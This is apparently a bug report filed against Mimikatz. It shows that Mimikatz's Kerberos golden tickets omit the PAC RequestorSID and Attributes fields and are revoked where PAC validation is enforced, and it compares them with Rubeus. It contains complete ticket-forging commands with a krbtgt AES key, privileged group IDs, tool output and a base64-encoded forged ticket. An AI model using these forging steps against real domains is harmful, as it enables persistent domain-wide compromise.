Mimikatz Golden Ticket fails to create PAC attribute RequestorSID

[g4uss47]

Summary

I was getting errors using a golden ticket created with Mimikatz of KDC_TGT_Revoked and led me to an investigation to find out that the golden ticket created by mimikatz was failing to create the PAC field correctly, it is not properly setting the RequestorSID and the AttributeFlags how it should, even when the program claims it is doing so.

This was done in an environment in which PAC validation is enforced and therefore since the RequestorSID field is empty, the PAC validation fails and the golden ticket is revoked.

Replication Steps

Mimikatz Golden Ticket

I first generate a mimikatz golden ticket for a user called willywonka:
kerberos::golden /domain:chocolatefactory.local /user:willywonka /sid:S-1-5-21-2377760704-1974907900-3052042330 /id:2000 /aes256:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C /ticket:golden_mimikatz.kirbi

And the execution claims that the PAC is generated and signed:

User      : willywonka
Domain    : chocolatefactory.local (CHOCOLATEFACTORY)
SID       : S-1-5-21-2377760704-1974907900-3052042330
User Id   : 2000
Groups Id : *513 512 520 518 519
ServiceKey: ea2344691d140975946372d18949706857eb9c5f65855b0e159e54260beb365c - aes256_hmac
Lifetime  : 18/04/2024 22:07:32 ; 16/04/2034 22:07:32 ; 16/04/2034 22:07:32
-> Ticket : golden_mimikatz.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

However, as i said previously this golden ticket was giving me the KDC_TGT_Revoked error, so i investigated and used rubeus to take a look at what was actually inside the ticket:

.\Rubeus.exe describe /ticket:golden_mimikatz.kirbi /servicekey:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2


[*] Action: Describe Ticket


  ServiceName              :  krbtgt/chocolatefactory.local
  ServiceRealm             :  chocolatefactory.local
  UserName                 :  willywonka (NT_PRINCIPAL)
  UserRealm                :  chocolatefactory.local
  StartTime                :  18/04/2024 22:02:54
  EndTime                  :  16/04/2034 22:02:54
  RenewTill                :  16/04/2034 22:02:54
  Flags                    :  pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  yakUMo5Akb7g+D8UayZrl3rn8iaSkX6fULGG/yD1LRk=
  Block One Plain Text     :  6384000003613084
  Decrypted PAC            :
    LogonInfo              :
      LogonTime            : 18/04/2024 22:02:54
      LogoffTime           :
      KickOffTime          :
      PasswordLastSet      :
      PasswordCanChange    :
      PasswordMustChange   :
      EffectiveName        : willywonka
      FullName             :
      LogonScript          :
      ProfilePath          :
      HomeDirectory        :
      HomeDirectoryDrive   :
      LogonCount           : 0
      BadPasswordCount     : 0
      UserId               : 2000
      PrimaryGroupId       : 513
      GroupCount           : 5
      Groups               : 513,512,520,518,519
      UserFlags            : (0) 0
      UserSessionKey       : 0000000000000000
      LogonServer          :
      LogonDomainName      : CHOCOLATEFACTORY
      LogonDomainId        : S-1-5-21-2377760704-1974907900-3052042330
      UserAccountControl   : (528) NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
      ExtraSIDCount        : 0
      ResourceGroupCount   : 0
    ClientName             :
      Client Id            : 18/04/2024 22:02:54
      Client Name          : willywonka
    ServerChecksum         :
      Signature Type       : KERB_CHECKSUM_HMAC_SHA1_96_AES256
      Signature            : 6B2DD580E09D063955E48C0E (VALID)
    KDCChecksum            :
      Signature Type       : KERB_CHECKSUM_HMAC_SHA1_96_AES256
      Signature            : AC649E0CC12A895B62D559F6 (VALID)

As we can see in the contents of the ticket the Attribute Flags and RequestorSID are missing.

Rubeus Golden Ticket

In order to make a comparison I generated the same golden ticket using Rubeus:

.\Rubeus.exe golden /aes256:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C /user:WillyWonka /id:2000 /domain:chocolatefactory.local /sid:S-1-5-21-2377760704-1974907900-3052042330 /displayname:"Willywonka" /netbios:WILLYWONKA /dc:dc1.chocolatefactory.local /outfile:golden_rubeus.kirbi

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : CHOCOLATEFACTORY.LOCAL (WILLYWONKA)
[*] SID            : S-1-5-21-2377760704-1974907900-3052042330
[*] UserId         : 2000
[*] Groups         : 520,512,513,519,518
[*] ServiceKey     : EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey         : EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service        : krbtgt
[*] Target         : chocolatefactory.local

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for '[email protected]'

[*] AuthTime       : 18/04/2024 22:14:11
[*] StartTime      : 18/04/2024 22:14:11
[*] EndTime        : 19/04/2024 8:14:11
[*] RenewTill      : 25/04/2024 22:14:11

[*] base64(ticket.kirbi):

      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

And analysing it in the same fashion as the golden ticket generated by mimikatz

.\Rubeus.exe describe /ticket:golden_rubeus.kirbi /servicekey:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2


[*] Action: Describe Ticket


  ServiceName              :  krbtgt/chocolatefactory.local
  ServiceRealm             :  CHOCOLATEFACTORY.LOCAL
  UserName                 :  WillyWonka (NT_PRINCIPAL)
  UserRealm                :  CHOCOLATEFACTORY.LOCAL
  StartTime                :  18/04/2024 22:03:08
  EndTime                  :  19/04/2024 8:03:08
  RenewTill                :  25/04/2024 22:03:08
  Flags                    :  pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  NZ9U6rbvOS4pbfvj4uphZjm3T2wAdrIA6Grr/P/KFmo=
  Block One Plain Text     :  6382043530820431
  Decrypted PAC            :
    LogonInfo              :
      LogonTime            : 18/04/2024 22:03:08
      LogoffTime           :
      KickOffTime          :
      PasswordLastSet      :
      PasswordCanChange    :
      PasswordMustChange   :
      EffectiveName        : WillyWonka
      FullName             : Willywonka
      LogonScript          :
      ProfilePath          :
      HomeDirectory        :
      HomeDirectoryDrive   :
      LogonCount           : 0
      BadPasswordCount     : 0
      UserId               : 2000
      PrimaryGroupId       : 513
      GroupCount           : 5
      Groups               : 520,512,513,519,518
      UserFlags            : (0) 0
      UserSessionKey       : 0000000000000000
      LogonServer          : DC1
      LogonDomainName      : WILLYWONKA
      LogonDomainId        : S-1-5-21-2377760704-1974907900-3052042330
      UserAccountControl   : (16) NORMAL_ACCOUNT
      ExtraSIDCount        : 0
      ResourceGroupCount   : 0
    ClientName             :
      Client Id            : 18/04/2024 22:03:08
      Client Name          : WillyWonka
    UpnDns                 :
      DNS Domain Name      : CHOCOLATEFACTORY.LOCAL
      UPN                  : [email protected]
      Flags                : (1) NO_UPN_SET
    Attributes             :
      AttributeLength      : 2
      AttributeFlags       : (1) PAC_WAS_REQUESTED
    Requestor              :
      RequestorSID         : S-1-5-21-2377760704-1974907900-3052042330-2000
    ServerChecksum         :
      Signature Type       : KERB_CHECKSUM_HMAC_SHA1_96_AES256
      Signature            : F06ACD94A42E9BC2A49AA1F9 (VALID)
    KDCChecksum            :
      Signature Type       : KERB_CHECKSUM_HMAC_SHA1_96_AES256
      Signature            : 512F28A02087A2D1896FB6A1 (VALID)

The AttributeFlags is properly set to PAC_WAS_REQUESTED and the RequestorSID is properly set